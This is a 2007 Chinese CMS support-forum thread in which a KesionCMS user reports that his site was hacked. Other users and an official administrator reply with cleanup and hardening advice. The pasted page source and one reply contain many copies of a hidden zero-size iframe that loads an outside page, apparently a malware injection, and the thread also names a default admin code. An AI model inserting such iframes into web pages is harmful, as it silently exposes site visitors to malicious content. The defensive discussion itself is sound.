账号通
    

账号  

密码  

3579

查看

17

回复
主题:我的科讯 被人黑了,救命 啊 [收藏主题] 转到:  
hhflxx 当前离线

861

主题

0

广播

1

粉丝
添加关注
级别:七年级

用户积分:4349 分
登录次数:365 次
注册时间:2006/7/20
最后登录:2012/3/10
hhflxx 发表于:2007/2/25 17:55:00   | 只看该作者 查看该作者主题 楼主 

后台进不去,察看源码发现被人增加了

<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>
 
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>

 
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>
 
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>

这些字段。救命啊


<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>
 
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>

 
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>
 
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>

 
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>
 
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>
<html><head><title>红河网---网站后台管理</title><script language="JavaScript">
<!--
   //保存复制,移动的对象,模拟剪切板功能
  function CommonCopyCutObj(ChannelID, PasteTypeID, SourceFolderID, FolderID, ContentID)
  {
   this.ChannelID=ChannelID;             //频道ID
   this.PasteTypeID=PasteTypeID;         //操作类型 0---无任何操作,1---剪切,2---复制
   this.SourceFolderID=SourceFolderID;   //所在的源目录
   this.FolderID=FolderID;               //目录ID
   this.ContentID=ContentID;             //文章或图片等ID
  }
  function CommonCommentBack(FromUrl)
  {
    this.FromUrl=FromUrl;             //保存来源页的地址
  }
  //初始化对象实例
 var CommonCopyCut=null;
 var CommonComment=null;
 var DocumentReadyTF=false;
 function document.onreadystatechange()
  {
    if (DocumentReadyTF==true) return;
    CommonCopyCut=new CommonCopyCutObj(0,0,0,'0','0');
    CommonComment=new CommonCommentBack(0);
    DocumentReadyTF=true;
  }
//-->
</script>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<frameset rows="65,*,33" border="0" frameborder="0" framespacing="0">
  <frame src="Admin_Index.asp?Action=Head" name="FrameTop" noresize scrolling="no"  frameborder="no"></frame>
  <frameset cols="165,*" name="FrameMain" border="0" frameborder="0" framespacing="0">
         <frame src="Admin_Index.asp?Action=Left" name="LeftFrame" frameborder="no" scrolling="no" marginwidth="0" marginheight="0"></frame>
         <frameset rows="*,26" border="0" frameborder="0" framespacing="0">
            <frame src="Admin_Index.asp?Action=Main"  noresize name="MainFrame" frameborder="no" scrolling="yes" marginwidth="0" marginheight="0"></frame>
            <frame src="Split.asp?ButtonSymbol=Disabled&OpStr= <font color=red>系统管理中心</font>" name="BottomFrame" frameborder="no" scrolling="no" marginwidth="0" marginheight="0"></frame>
        </frameset>
  </frameset>
  <frame src="Admin_Index.asp?Action=Foot" name="FrameBottom" noresize frameborder="no" scrolling="no" marginwidth="0" marginheight="0"></frame>
</frameset>
<noframes>您的浏览器版本太低,请安装IE5.5或以上版本!</noframes>
</html>
 
<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
longer1981 当前离线

11

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:399 分
登录次数:26 次
注册时间:2006/11/6
最后登录:2007/9/30
longer1981 发表于:2007/2/26 15:38:00   | 只看该作者 查看该作者主题 沙发 
我的也中了,也是万网服务器.哎6666666
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
科汛官方 当前离线

47268

主题

145

广播

405

粉丝
添加关注
级别:管理员

用户积分:101604 分
登录次数:7935 次
注册时间:2006/12/7
最后登录:2023/12/14
科汛官方 发表于:2007/2/26 15:40:00   | 只看该作者 查看该作者主题 藤椅 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
iyes 当前离线

72

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:704 分
登录次数:81 次
注册时间:2006/9/22
最后登录:2008/1/15
iyes 发表于:2007/2/26 12:48:00   | 只看该作者 查看该作者主题 板凳 
科汛在线网校系统

 怎么办呢?晕死.我的也是这样.怎么解决呢.

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
大笨熊 当前离线

322

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:1236 分
登录次数:30 次
注册时间:2007/1/3
最后登录:2007/3/15
大笨熊 发表于:2007/2/25 21:35:00   | 只看该作者 查看该作者主题 报纸 
科汛在线网校系统

江民杀毒软件提醒您:由于内容为病毒,已经删除!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
xjxy 当前离线

322

主题

1

广播

2

粉丝
添加关注
级别:三年级

用户积分:3493 分
登录次数:379 次
注册时间:2006/9/20
最后登录:2020/3/3
xjxy 发表于:2007/2/25 20:15:00   | 只看该作者 查看该作者主题 地板 
科汛在线考试系统(NET)

你可以检查下你电脑中别的ASP文件,如果电脑里的所有ASP文件都有的话,木马是下在你电脑里的!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
hhflxx 当前离线

861

主题

0

广播

1

粉丝
添加关注
级别:七年级

用户积分:4349 分
登录次数:365 次
注册时间:2006/7/20
最后登录:2012/3/10
hhflxx 发表于:2007/2/25 20:17:00   | 只看该作者 查看该作者主题 7楼 
科汛智能建站系统
以下是引用xjxy在2007-2-25 20:15:33的发言:

你可以检查下你电脑中别的ASP文件,如果电脑里的所有ASP文件都有的话,木马是下在你电脑里的!

这段时间都没有过上传下载,我这里没有问题。已经木马克星和木马清道夫都查过了。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
hhflxx 当前离线

861

主题

0

广播

1

粉丝
添加关注
级别:七年级

用户积分:4349 分
登录次数:365 次
注册时间:2006/7/20
最后登录:2012/3/10
hhflxx 发表于:2007/2/25 20:14:00   | 只看该作者 查看该作者主题 8楼 
科汛在线商城系统(NET)

找到木马了,火狐 webshell

万网的服务器都可以养马呵呵,不可靠啊。

这个东东还真厉害呢,别的不说能够在线远程批量修改文件字符就够作用大了。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
binghebook 当前离线

79

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:881 分
登录次数:94 次
注册时间:2006/7/17
最后登录:2008/2/17
binghebook 发表于:2007/2/26 16:30:00   | 只看该作者 查看该作者主题 9楼 
科汛在线考试系统(NET)

<iframe src="http://www.yijue.org/2.html" width="0" height="0" frameborder="0"></iframe>

你要找到目马文件才行啊,先关毕程序的所有上传,然后到cms中UpFiles/User/目录中找到有.asp的文件夹,那肯定是黑你的人建立的,在下面找到.gif或.jpg的图片文件,想办法让他显示出来,如果没有显示示或显示的是一页代码那肯定就是木马了,删!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
科汛官方 当前离线

47268

主题

145

广播

405

粉丝
添加关注
级别:管理员

用户积分:101604 分
登录次数:7935 次
注册时间:2006/12/7
最后登录:2023/12/14
科汛官方 发表于:2007/2/25 18:28:00   | 只看该作者 查看该作者主题 10楼 
科汛在线商城系统(NET)

这里我给大家总结几条使用科汛系统安全的小经验:

1、删除install.asp文件

      网站安装成功后,一定要删除install.asp文件(非常重要)。

2、及时修改数据库名称

       由于科汛自带的数据库是在ks_data目录下的ks_database.mdb,如果你没有对它进行更名,这时可能你的数据库就会随时被了解科汛结构的人下载,从而导致后台用户密码被***等。解决方法就是及时对数据库进行更名。将数据库改为难以猜测的名称,并将数据库的扩展名改为.asp等。

3、设置后台登录认证码

    认证码的作用就是当有人知道你后台用户名和密码,但不知道认证码时,也无法登录后台。科汛V3.X默认的认证码是kesion2006,建议你及时打开admin目录下的chkcode.asp进行设置,具体位置如下:

Const EnableSiteManageCode = True        '是否启用后台管理认证码 是: True  否: False
Const SiteManageCode = "kesion2006"      '后台管理认证码,请修改,这样即使有人知道了您的后台用户名和密码也不能登录后台

4、修改后台的管理路径

     科汛默认的后台文件都在admin目录下,以免给不良居心的朋友猜到,你可以对该目录进行更名,如改为manage等。改完后只需登录后台进行目录设置即可,具体如下系统设置->基本信息设置->目录选项,并将admin/改成你的名称并保存即可。

网站后台目录:     
  
模板文件目录:     
后面必须带"/"符号

5、尽量不要给会员太大的上传权限

    科汛3.0的会员系统有了很大的改进,每个会员上传的文件都有独立的目录。系统默认每个会员分配2M的存储空间。你可以在后台进行详细的设置。特别是允许上传的类型要小心设置,千万不要允许上传.asp,.aspx,.php等为扩展名的文件。如果不允行用户上传任何文件,可以将分配的存储空间设为0,具体步骤:系统设置->基本信息设置->会员选项,如下图的会员可用空是大小设为0即表示,不允许上传。

会员站内短信设置:     
最大容量为条,短信内容最多字符数个字符 群发限制人数
  
会员可用空间大小:     
KB   提示:1 KB = 1024 Byte,1 MB = 1024 KB

6、做好服务器的安全工作

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.23438秒 powered by KesionCMS 9.0